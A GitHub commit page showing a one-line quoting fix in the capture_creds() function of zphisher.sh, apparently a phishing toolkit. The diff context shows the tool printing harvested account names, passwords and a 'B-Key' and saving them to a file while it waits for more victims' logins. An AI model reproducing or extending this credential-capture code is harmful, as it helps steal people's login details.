Skip to content

Commit

Permalink
Update zphisher.sh
Browse files Browse the repository at this point in the history
  • Loading branch information
dracksters authored Jun 14, 2024
1 parent 6823f38 commit 69fb32d
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion zphisher.sh
Original file line number Diff line number Diff line change
Expand Up @@ -427,7 +427,7 @@ capture_creds() {
IFS=$'\n'
echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Account : ${BLUE}$ACCOUNT"
echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Password : ${BLUE}$PASSWORD"
echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} B-Key : ${BLUE}$BKEY
echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} B-Key : ${BLUE}$BKEY"
echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} Saved in : ${ORANGE}auth/usernames.dat"
cat .server/www/usernames.txt >> auth/usernames.dat
echo -ne "\n${RED}[${WHITE}-${RED}]${ORANGE} Waiting for Next Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit. "
Expand Down

0 comments on commit 69fb32d

Please sign in to comment.